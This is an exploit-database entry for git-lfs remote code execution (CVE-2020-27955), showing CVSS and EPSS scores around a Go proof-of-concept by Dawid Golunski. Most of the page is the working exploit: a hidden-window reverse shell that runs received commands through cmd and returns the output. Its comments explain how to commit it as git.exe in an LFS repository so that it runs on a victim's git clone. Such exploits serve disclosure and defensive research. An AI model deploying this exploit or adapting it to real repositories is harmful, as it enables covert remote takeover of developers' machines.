Dawid Golunski1337DAY-ID-35186git-lfs Remote Code Execution Exploit
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.94 High
EPSS
Percentile
99.1%
Proof of concept git-lfs remote code execution exploit written in Go. Affects Git, GitHub CLI, GitHub Desktop, Visual Studio, GitKraken, SmartGit, SourceTree, and more.
/*
Go PoC exploit for git-lfs - Remote Code Execution (RCE)
vulnerability CVE-2020-27955
git-lfs-RCE-exploit-CVE-2020-27955.go
Discovered by Dawid Golunski
https://legalhackers.com
https://exploitbox.io
Affected (RCE exploit):
Git / GitHub CLI / GitHub Desktop / Visual Studio / GitKraken /
SmartGit / SourceTree etc.
Basically the whole Windows dev world which uses git.
Usage:
Compile: go build git-lfs-RCE-exploit-CVE-2020-27955.go
Save & commit as git.exe
The payload should get executed automatically on git clone operation.
It spawns a reverse shell, or a calc.exe for testing (if it
couldn't connect).
An lfs-enabled repository with lfs files may also be needed so that git-lfs
gets invoked. This can be achieved with:
git lfs track "*.dat"
echo "fat bug file" > lfsdata.dat
git add .*
git add *
git commmit -m 'git-lfs exploit' -a
Check out the full advisory for details:
https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html
https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html
PoC video at:
https://youtu.be/tlptOf9w274
** For testing purposes only **
*/
package main
import (
"net"
"os/exec"
"bufio"
"syscall"
)
func revsh(host string) {
c, err := net.Dial("tcp", host)
if nil != err {
// Conn failed
if nil != c {
c.Close()
}
// Calc for testing purposes if no listener available
cmd := exec.Command("calc")
cmd.Run()
return
}
r := bufio.NewReader(c)
for {
runcmd, err := r.ReadString('\n')
if nil != err {
c.Close()
return
}
cmd := exec.Command("cmd", "/C", runcmd)
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
out, _ := cmd.CombinedOutput()
c.Write(out)
}
}
// Connect to netcat listener on local port 1337
func main() {
revsh("localhost:1337")
}
--
Regards,
Dawid Golunski
Related
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.94 High
EPSS
Percentile
99.1%